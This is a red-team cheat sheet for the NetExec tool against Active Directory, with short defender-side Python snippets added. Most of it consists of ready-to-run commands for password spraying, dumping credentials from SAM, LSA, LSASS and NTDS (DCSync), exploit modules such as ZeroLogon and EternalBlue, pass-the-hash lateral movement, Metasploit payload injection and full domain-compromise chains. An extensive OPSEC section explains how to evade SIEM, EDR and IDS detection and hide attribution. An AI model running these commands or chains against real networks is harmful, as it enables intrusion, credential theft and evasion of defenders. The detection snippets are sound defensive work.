// Red Team Operations Reference //

NETEXEC (nxc) COMPLETE CHEAT SHEET + OPSEC GUIDE

v1.5.x | SMB · LDAP · WINRM · WMI · MSSQL · SSH · FTP · RDP · VNC · NFS | ACTIVE DIRECTORY
Installation & Syntax
Install (Kali)
sudo apt install netexec
Install (pipx — latest)
pipx install git+https://github.com/Pennyw0rth/NetExec
Universal Syntax
nxc [global opts] <protocol> <target> [opts] [-M module] [-o opts]
Protocols Available
smb, ldap, winrm, wmi, mssql, ssh, ftp, rdp, vnc, nfs
Target Formats
nxc smb 192.168.1.10        # single IP
nxc smb 192.168.1.0/24      # CIDR
nxc smb 192.168.1.1-50      # range
nxc smb targets.txt         # from file
nxc smb domain.local        # hostname
Key Global Flags
Flag                 Description
-t N                 threads (default 100)
--timeout N          per-thread timeout (sec)
--jitter N           random delay between requests
--log file.log       save all output to file
--no-progress        disable progress bar
--verbose / --debug  increase output verbosity
-6                   force IPv6
--dns-server IP      custom DNS resolver
Authentication Methods
Password Auth
nxc smb <target> -u USER -p PASS -d DOMAIN
Local Auth (--local-auth)
nxc smb <target> -u admin -p PASS --local-auth
Pass-the-Hash (PTH)
nxc smb <target> -u USER -H <NTLM_HASH>
nxc smb <target> -u USER -H LM:NTLM
Kerberos Auth (-k)
nxc smb <target> -u USER -p PASS -k -d DOMAIN
nxc smb <target> -u USER --use-kcache -k      # use ccache
nxc smb <target> -u USER --aesKey KEY -k      # AES key
export KRB5CCNAME=/tmp/tgt.ccache
nxc smb <target> --use-kcache -k
Null / Guest Session
nxc smb <target> -u '' -p ''         # null session
nxc smb <target> -u guest -p ''      # guest
nxc ldap <target> -u '' -p ''        # anon LDAP bind
From nxcdb (stored creds)
nxc smb <target> -id 1          # use cred ID from DB
nxc smb <target> -id 1 2 3      # multiple cred IDs
Defeating LAPS
nxc smb <target> -u USER -p PASS --laps
nxc smb <target> -u USER -p PASS --laps 'admin_name'
Password Spraying & Brute Force
Basic Spray
nxc smb <target> -u users.txt -p 'Password123!' --continue-on-success
Paired Lists (user:pass pairs)
nxc smb <target> -u users.txt -p pass.txt --no-bruteforce --continue-on-success
With Jitter (OPSEC)
nxc smb <target> -u users.txt -p 'Pass!' --jitter 5 --continue-on-success
Fail Limit Controls
--gfail-limit 10    # global fail count limit
--ufail-limit 3     # per-user fail limit ← lockout safety
--fail-limit 5      # per-host fail limit
Check Pass Policy First!
nxc smb <target> -u '' -p '' --pass-pol
⚠ LOCKOUT RISK: Always check --pass-pol before spraying. Use --ufail-limit 1 if policy is strict (e.g., 3 attempts). Spray one password per observation window.
Spray Over WinRM / SSH
nxc winrm <CIDR> -u users.txt -p 'Pass!' --no-bruteforce
nxc ssh <target> -u users.txt -p pass.txt --continue-on-success
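As an added defender-side example (not part of this cheat sheet or of NetExec), the detection below shows why --ufail-limit 1 keeps a spray under lockout thresholds but not under the radar: it groups constructed failed-logon records (event 4625 shape) by source and alerts on the number of distinct accounts, not on failures per account. The record fields, the sample data and the thresholds are assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon records in the shape of Windows Security
# event 4625: (timestamp, source IP, target account). Not real telemetry.
# 10.1.1.50 fails exactly once against each of 11 accounts, 7 s apart: the
# footprint of a "--ufail-limit 1 --jitter" spray. No account ever reaches a
# lockout threshold, but the distinct-account count from one source is anomalous.
# 10.1.1.77 is one user mistyping their own password three times.
_BASE = datetime(2024, 3, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    ((_BASE + timedelta(seconds=7 * i)).isoformat(), "10.1.1.50", f"user{i:02d}")
    for i in range(11)
] + [
    ((_BASE + timedelta(seconds=30 + 20 * i)).isoformat(), "10.1.1.77", "alice")
    for i in range(3)
]


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return one alert per source IP that failed logons against at least
    `min_users` distinct accounts inside any sliding `window`.

    Alert shape: (source_ip, window_start_iso, distinct_accounts, max_failures_per_account).
    A high distinct count with a low per-account maximum is the signature of a
    lockout-aware spray; per-account lockout rules never fire on it.
    """
    by_source = defaultdict(list)
    for ts, src, user in events:
        by_source[src].append((datetime.fromisoformat(ts), user))

    alerts = []
    for src, evs in by_source.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            in_window = Counter(u for t, u in evs[i:] if t - start <= window)
            if len(in_window) >= min_users:
                alerts.append((src, start.isoformat(), len(in_window), max(in_window.values())))
                break  # one alert per source; later windows belong to the same campaign
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print("spray suspected from %s starting %s: %d accounts, max %d failure(s) each" % alert)
```

Because --jitter spreads the attempts out, the detection window has to cover at least the lockout observation window that --pass-pol reports, not a few seconds.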
SMB Enumeration
Host Discovery
nxc smb 192.168.1.0/24                          # live hosts + info
nxc smb <CIDR> --gen-relay-list out.txt         # SMB signing OFF
Users & Groups
nxc smb <t> -u U -p P --users
nxc smb <t> -u U -p P --groups
nxc smb <t> -u U -p P --local-users
nxc smb <t> -u U -p P --local-groups
nxc smb <t> -u '' -p '' --rid-brute         # RID enum (null)
nxc smb <t> -u U -p P --rid-brute 10000
Shares
nxc smb <t> -u U -p P --shares
nxc smb <t> -u U -p P -M spider_plus                        # spider all shares
nxc smb <t> -u U -p P -M spider_plus -o READ_ONLY=false     # download all
Sessions & Logged-on Users
nxc smb <t> -u U -p P --sessions
nxc smb <t> -u U -p P --loggedon-users
nxc smb <t> -u U -p P --lusers
Enum Everything (one shot)
nxc smb <t> -u U -p P \
    --groups --local-groups \
    --loggedon-users --rid-brute \
    --sessions --users --shares \
    --pass-pol
File Operations
nxc smb <t> -u U -p P --get-file TARGET_PATH LOCAL_PATH --share SHARE
nxc smb <t> -u U -p P --put-file LOCAL_PATH TARGET_PATH --share SHARE
Computers in Domain
nxc smb <t> -u U -p P --computers
Disk Enumeration
nxc smb <t> -u U -p P --disks
GPP Passwords (Group Policy)
nxc smb <t> -u U -p P -M gpp_password
nxc smb <t> -u U -p P -M gpp_autologin
Proxychains Support
proxychains -q nxc smb <target> -u U -p P --users
LDAP Enumeration (Preferred — Less Noisy)
Domain Users / Groups / Computers
nxc ldap <DC> -u U -p P --users
nxc ldap <DC> -u U -p P --groups
nxc ldap <DC> -u U -p P --computers
Domain SID
nxc ldap <DC> -u U -p P -k --get-sid
Kerberoasting
nxc ldap <DC> -u U -p P --kerberoasting output.txt
ASREProasting
nxc ldap <DC> -u U -p P --asreproast output.txt
Delegation Misconfigs
nxc ldap <DC> -u U -p P --find-delegation
nxc ldap <DC> -u U -p P --trusted-for-delegation      # unconstrained
Password in Description / AdminCount / MAQ
nxc ldap <DC> -u U -p P -M get-desc-users     # passwords in descriptions
nxc ldap <DC> -u U -p P --admin-count         # adminCount=1 objects
nxc ldap <DC> -u U -p P -M maq                # MachineAccountQuota
GMSA / Pre-2012 Accounts
nxc ldap <DC> -u U -p P --gmsa
nxc ldap <DC> -u U -p P -M pre2k
DACL / ACL Read
nxc ldap <DC> -u U -p P --kdcHost <DC> -M daclread -o TARGET=USER ACTION=read
nxc ldap <DC> -u U -p P --kdcHost <DC> -M daclread \
    -o TARGET_DN="DC=corp,DC=local" ACTION=read RIGHTS=DCSync
✓ OPSEC: Prefer LDAP over SMB for domain enumeration — it generates far less event log noise and avoids touching SMB services.
Command Execution
CMD Execution (SMB)
nxc smb <t> -u U -p P -x 'whoami'
PowerShell Execution
nxc smb <t> -u U -p P -X 'Get-Process'
Execution Methods (choose explicitly)
--exec-method wmiexec    # WMI (default, good opsec)
--exec-method atexec     # Scheduled Task
--exec-method smbexec    # Service creation (NOISY)
--exec-method mmcexec    # MMC20 (stealthiest)
⚠ smbexec creates a Windows service — very noisy, triggers EDR. Prefer wmiexec or mmcexec for stealth.
WinRM Execution
nxc winrm <t> -u U -p P -x 'whoami'
nxc winrm <t> -u U -p P -X 'Get-Process'
WMI Direct Execution
nxc wmi <t> -u U -p P -x 'ipconfig'
Credential Dumping
SAM Database
nxc smb <t> -u U -p P --sam
LSA Secrets
nxc smb <t> -u U -p P --lsa
NTDS (Domain Controller)
nxc smb <DC> -u U -p P --ntds            # drsuapi (DCSync)
nxc smb <DC> -u U -p P --ntds vss        # VSS method (shadow copy)
nxc smb <DC> -u U -p P -M ntdsutil       # ntdsutil method
LSASS (lsassy module)
nxc smb <t> -u U -p P -M lsassy
nxc smb <t> -u U -p P -M handlekatz
nxc smb <t> -u U -p P -M nanodump
DPAPI (Browser / Credential Manager)
nxc smb <t> -u U -p P --dpapi
MSOL (Azure AD Connect)
nxc smb <t> -u U -p P -M msol
GMSA Secret Decrypt
nxc ldap <DC> -u U -p P --gmsa-decrypt-lsa gmsa_account
🚨 OPSEC: NTDS drsuapi (DCSync) is high-signal. Do DCSync DC-to-DC when possible. VSS method writes to disk — noisier. lsassy touches LSASS memory — EDR alert risk.
Vulnerability Scanning (Modules)
nxc smb <DC> -u '' -p '' -M zerologon        # ZeroLogon
nxc smb <DC> -u '' -p '' -M petitpotam       # PetitPotam
nxc smb <t> -u U -p P -M nopac               # noPac / CVE-2021-42278
nxc smb <t> -u U -p P -M printnightmare      # PrintNightmare
nxc smb <t> -u U -p P -M smbghost            # CVE-2020-0796
nxc smb <t> -u '' -p '' -M ms17-010          # EternalBlue
nxc smb <t> -u U -p P -M ntlm_reflection     # CVE-2025-33073
nxc smb <t> -u U -p P -M webdav              # WebDAV check
List / Explore Modules
nxc smb -L                            # list all SMB modules
nxc ldap -L                           # list LDAP modules
nxc smb -M lsassy --options           # module options
nxc smb -M mimikatz --module-info     # module info
MSSQL
Auth & Query
nxc mssql <t> -u SA -p PASS --local-auth
nxc mssql <t> -u U -p P -q 'SELECT name FROM master.dbo.sysdatabases;'
OS Command via xp_cmdshell
nxc mssql <t> -u U -p P -x 'whoami'
nxc mssql <t> -u U -p P --put-file local.txt C:\path\remote.txt
nxc mssql <t> -u U -p P --get-file C:\path\file.txt local.txt
Privilege Escalation
nxc mssql <t> -u U -p P -M mssql_priv # check SA, impersonation
Lateral Movement & Post-Exploitation
Admin Check Across Network
nxc smb <CIDR> -u USER -H HASH --local-auth     # find local admin
nxc smb <CIDR> -u USER -p PASS -d DOM           # domain admin check
Pass-the-Hash Lateral Movement
nxc smb <CIDR> -u admin -H <NTLM> --local-auth -x 'whoami'
Overpass-the-Hash / Kerberos
nxc smb <t> -u U --aesKey <AES256> -k     # preferred over PTH
nxc smb <t> -u U -H HASH -k               # hash + Kerberos
Empire / Metasploit Integration
nxc smb <t> -u U -p P -M empire_exec -o LISTENER=mylistener
nxc smb <t> -u U -p P -M met_inject -o LHOST=IP LPORT=4444
WinRM Remote Shell
nxc winrm <t> -u U -p P -X 'Get-LocalUser'
RDP Check
nxc rdp <t> -u U -p P          # check RDP access
nxc rdp <CIDR> -u U -p P       # sweep
SSH
nxc ssh <t> -u root -p PASS -x 'id'
nxc ssh <t> -u U --key-file id_rsa -x 'id'
BloodHound Collection
nxc ldap <DC> -u U -p P -M bloodhound        # collect + auto ingest
nxc ldap <DC> -u U -p P -M bloodhound \
    -o COLLECTION_METHOD=All BLOODHOUND_PATH=/tmp
nxcdb — Built-in Database
nxcdb                                        # launch interactive DB
nxcdb -q "select * from hosts"
nxcdb -q "select * from credentials"
Inside nxcdb shell
hosts             # list all hosts
creds             # list credentials
export smb        # export SMB results
creds del <id>    # remove credential
✓ TIP: nxc stores every successful auth automatically. Use -id N to reuse saved credentials across sessions — avoids retyping and keeps creds organized.
FTP / NFS / VNC
FTP
nxc ftp <t> -u U -p P --ls                       # list files
nxc ftp <t> -u U -p P --ls folder                # list folder
nxc ftp <t> -u U -p P --ls folder --get file     # download
NFS
nxc nfs <t> --shares                             # list NFS shares
nxc nfs <t> -u U -p P --get-file <path> <local>
VNC
nxc vnc <t> -p PASSWORD # auth check
Common Attack Chains
Chain 1 — Unauthenticated → Domain Compromise
null session enum → RID brute users → spray 1 password → LDAP enum → Kerberoast → DCSync
nxc smb <DC> -u '' -p '' --rid-brute > users.txt
nxc smb <DC> -u users.txt -p 'Winter2024!' --jitter 3 --ufail-limit 1
nxc ldap <DC> -u USER -p PASS --kerberoasting kerbhashes.txt
# crack hashes → reuse → nxc smb <DC> -u admin -p cracked --ntds
Chain 2 — Hash Reuse Sweep
dump SAM/LSA → extract hashes → PTH sweep CIDR → exec on admin hosts
nxc smb <t> -u admin -p PASS --sam
nxc smb 192.168.1.0/24 -u admin -H <NTLM> --local-auth --continue-on-success
Chain 3 — Relay Setup (No Signing)
find no-signing hosts → gen relay list → ntlmrelayx → pivot
nxc smb 192.168.1.0/24 --gen-relay-list relay.txt
ntlmrelayx.py -tf relay.txt -smb2support
Chain 4 — Stealthy Domain Recon
anon LDAP → desc passwords → delegation abuse → BloodHound
nxc ldap <DC> -u '' -p '' --users
nxc ldap <DC> -u U -p P -M get-desc-users
nxc ldap <DC> -u U -p P --find-delegation
nxc ldap <DC> -u U -p P -M bloodhound -o COLLECTION_METHOD=All
OPSEC — Maintaining Stealth During Operations
🔇 Noise Reduction — Core Controls
Jitter: Always add --jitter 5 (or higher) between requests. Random delays break timing-based detection correlations in SIEMs.
nxc smb <CIDR> -u U -p P --jitter 5      # 0-5s random delay
nxc smb <CIDR> -u U -p P --jitter 30     # slower = stealthier
Thread Count: Default is 100 threads — extremely noisy. Drop to 5–10 on sensitive engagements. Defenders see burst auth as an immediate IOC.
nxc smb <CIDR> -u U -p P -t 5 --jitter 10
Fail Limits: Set --ufail-limit 1 or --ufail-limit 2 per user to avoid lockouts and avoid setting off lockout alerting rules.
nxc smb <t> -u users.txt -p pass.txt --ufail-limit 1 --gfail-limit 20
⚙ Execution Method — IOC Comparison
Method     Noise Level   Artifact                  Recommended
mmcexec    Lowest        COM object                ✓ Stealth
wmiexec    Low           WMI process               ✓ Good
atexec     Medium        Sched. Task log           ⚠ Careful
smbexec    HIGH          Service install + event   ✗ Avoid
nxc smb <t> -u U -p P --exec-method mmcexec -x 'whoami'
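As an added defender-side example (not from this cheat sheet or from NetExec), the classifier below maps constructed host events to the execution method whose artifact they match, following the IOC table above. Which event ID or parent process each method leaves behind is an assumption about the method's behaviour, stated in the comments, and the sample events are constructed.

```python
import re

# Constructed, simplified host events (not real telemetry). Assumed artifact per
# --exec-method, matching the IOC table: smbexec installs a service whose binary
# is a shell one-liner (System 7045); atexec registers a scheduled task that runs
# a shell (Security 4698); wmiexec's command is spawned by the WMI provider host
# WmiPrvSE.exe; mmcexec drives MMC20.Application over DCOM, so it runs under mmc.exe.
SAMPLE_EVENTS = [
    {"channel": "System", "id": 7045, "service": "tmpsvc",
     "image_path": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__out > %TEMP%\x.bat"},
    {"channel": "Security", "id": 4698, "task": r"\Microsoft\Windows\Update",
     "command": r"cmd.exe /C whoami > C:\Windows\Temp\out.txt"},
    {"channel": "Sysmon", "id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /Q /c whoami"},
    {"channel": "Sysmon", "id": 1, "parent": r"C:\Windows\System32\mmc.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /Q /c whoami"},
    {"channel": "Sysmon", "id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},   # benign shell
]

# A service binary or task action that is itself a "cmd /c ..." one-liner.
SHELL_ONE_LINER = re.compile(r"(cmd(\.exe)?|%COMSPEC%)\s.*?/c\s", re.IGNORECASE)


def classify(event):
    """Return the remote-execution method this event most resembles, or None."""
    ch, eid = event["channel"], event["id"]
    if ch == "System" and eid == 7045 and SHELL_ONE_LINER.search(event.get("image_path", "")):
        return "smbexec"        # service install: the loudest artifact in the table
    if ch == "Security" and eid == 4698 and SHELL_ONE_LINER.search(event.get("command", "")):
        return "atexec"         # scheduled task created only to run a shell
    if ch == "Sysmon" and eid == 1:
        parent = event.get("parent", "").lower()
        if parent.endswith("\\wbem\\wmiprvse.exe"):
            return "wmiexec"    # Win32_Process.Create child of the WMI host
        if parent.endswith("\\mmc.exe"):
            return "mmcexec"    # quiet, but mmc.exe spawning a shell is still unusual
    return None


def triage(events):
    """Count matched events per method so the noisiest technique stands out."""
    hits = {}
    for ev in events:
        method = classify(ev)
        if method:
            hits[method] = hits.get(method, 0) + 1
    return hits
```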
🔑 Credential Hygiene
AES over NTLM: When doing Pass-the-Hash, prefer Overpass-the-Hash with AES256 keys via Kerberos. NTLM auth to DCs is more alarming to security teams.
nxc smb <t> -u USER --aesKey <AES256_KEY> -k # overpass-the-hash
Use kcache: Reuse Kerberos tickets from ccache instead of re-authenticating with credentials each time.
export KRB5CCNAME=/tmp/admin.ccache
nxc smb <t> -u USER --use-kcache -k
🌐 Infrastructure & Routing OPSEC
Proxy Everything: Route nxc through proxychains/SOCKS to avoid attribution of scan traffic to your direct IP. Never scan from your C2 server directly.
proxychains -q nxc smb <target> -u U -p P --users
Separate IPs per action: If you run scans, phishing, and exploits from the same IP, detection of one collapses all. Use dedicated, ephemeral IPs per operation type.
DNS Ops: Use a custom DNS server to avoid leaking queries to corporate resolvers.
nxc smb <target> --dns-server 8.8.8.8 -u U -p P
🪵 Logging & Evidence Control
Log Everything Locally: Always log nxc output to a file for your own records — helps de-conflict what was done and when.
nxc smb <t> -u U -p P --users --log /tmp/enum_$(date +%F).log
nxc.conf OPSEC Warnings: NetExec warns you before running noisy actions. Do NOT globally disable these — they exist to protect you.
# ~/.nxc/nxc.conf
ignore_opsec = False    # KEEP THIS FALSE — warnings are valuable
🔬 Stealth Enumeration Priorities
1. LDAP first: Prefer LDAP over SMB for all domain recon — much quieter, no SMB event logs.
2. Read before writing: Get-file, spider, enumerate before any exec or write. Each exec is a potential alert.
3. Null sessions before creds: Exhaust unauthenticated enumeration before burning credentials.
4. Target one host at a time: Scanning /24 simultaneously triggers IDS/NDR. Narrow scope = lower detection probability.
5. DCSync DC-to-DC: If replicating NTDS, route DCSync between DCs rather than from a workstation to a DC — replication between DCs is expected traffic.
📋 OPSEC Pre-Flight Checklist
# Before any spray:
nxc smb <DC> -u '' -p '' --pass-pol     # 1. Check lockout policy
# Confirm: observation window, bad pwd count
# Before any exec:
# 2. Know which EDR is deployed
# 3. Choose exec method accordingly (wmiexec/mmcexec)
# 4. Use -t 5 --jitter 10 minimum
# 5. Log to file with --log
Pro Tips & Advanced Usage
Custom Port
nxc smb <t> -u U -p P --port 4445
IPv6 Scanning
nxc smb <t> -u U -p P -6
Timeout Tuning
nxc smb <CIDR> --timeout 5 -t 50      # faster but less reliable
nxc smb <CIDR> --timeout 30 -t 10     # slow, reliable, stealthy
Kerberoasting + Crack Loop
nxc ldap <DC> -u U -p P --kerberoasting kerb.txt
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt
Find Hosts w/ Local Admin (lateral sweep)
nxc smb 10.0.0.0/24 -u admin -H <HASH> --local-auth 2>/dev/null | grep -i pwn3d
Check Module Options Before Running
nxc smb -M lsassy --options                  # always check first
nxc smb <t> -u U -p P -M lsassy -o METHOD=1
Combine Enum Flags Efficiently
nxc smb <t> -u U -p P \
    --users --groups --computers \
    --shares --pass-pol \
    --log full_enum.log
BloodHound + nxc (one shot)
nxc ldap <DC> -u U -p P -M bloodhound \
    -o COLLECTION_METHOD=All \
    BLOODHOUND_PATH=/tmp/bh/
Filter Only Successful Hits
nxc smb <CIDR> -u U -p P 2>/dev/null | grep -E '\+|-'
Keep nxc Updated
pipx upgrade netexec     # always run latest
nxc --version
Output Symbols
Symbol      Meaning
[+]         Successful authentication
[-]         Failed authentication
(Pwn3d!)    Admin-level access confirmed
[*]         Informational / status
[!]         Error or OPSEC warning
[OPSEC]     Noisy action — proceed carefully
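As an added example (not from this cheat sheet or from NetExec), the parser below turns lines in the shape of nxc's console output into records keyed by the symbols above, counts results per symbol, lists hosts where admin access was confirmed, and redacts the password or hash that follows DOMAIN\user: so a --log file can be shared in a report or handed to the blue team for de-confliction. The column layout and the sample lines are constructed assumptions, not a real capture.

```python
import re
from collections import Counter

# Constructed lines in the shape of nxc console output (not a real capture).
# Assumed column layout: protocol, target IP, port, hostname, then a message
# prefixed by one of the symbols from the table above.
SAMPLE_OUTPUT = """\
SMB         192.168.1.10    445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.10    445    DC01             [+] corp.local\\jdoe:Winter2024! (Pwn3d!)
SMB         192.168.1.11    445    WS01             [+] corp.local\\jdoe:Winter2024!
SMB         192.168.1.12    445    FS01             [-] corp.local\\jdoe:Winter2024! STATUS_LOGON_FAILURE
SMB         192.168.1.13    445    WS02             [!] Connection Error: timed out
"""

LINE_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"(?P<symbol>\[\+\]|\[-\]|\[\*\]|\[!\]|\[OPSEC\])\s*(?P<msg>.*)$"
)
# DOMAIN\user:secret as nxc prints it; the secret (password or hash) is redacted.
CRED_RE = re.compile(r"^(?P<ident>[^\\\s]+\\[^:\s]+):(?P<secret>\S+)")


def parse_line(line):
    """Parse one nxc output line into a dict; returns None for non-result lines."""
    m = LINE_RE.match(line.rstrip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["admin"] = "(Pwn3d!)" in rec["msg"]
    rec["msg"] = CRED_RE.sub(r"\g<ident>:<redacted>", rec["msg"])
    return rec


def summarize(text):
    """Counts per symbol, hosts with confirmed admin access, and redacted records."""
    recs = [r for r in map(parse_line, text.splitlines()) if r]
    return {
        "by_symbol": dict(Counter(r["symbol"] for r in recs)),
        "admin_hosts": sorted(r["host"] for r in recs if r["admin"]),
        "records": recs,
    }


if __name__ == "__main__":
    summary = summarize(SAMPLE_OUTPUT)
    print(summary["by_symbol"], summary["admin_hosts"])
```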
Resources
https://www.netexec.wiki/                              # official docs
https://github.com/Pennyw0rth/NetExec
https://github.com/seriotonctf/cme-nxc-cheat-sheet
https://pentesting.site/cheat-sheets/netexec/
🔄 Always: run nxc <protocol> --help and nxc <protocol> -L to check your version's options — flags change between releases.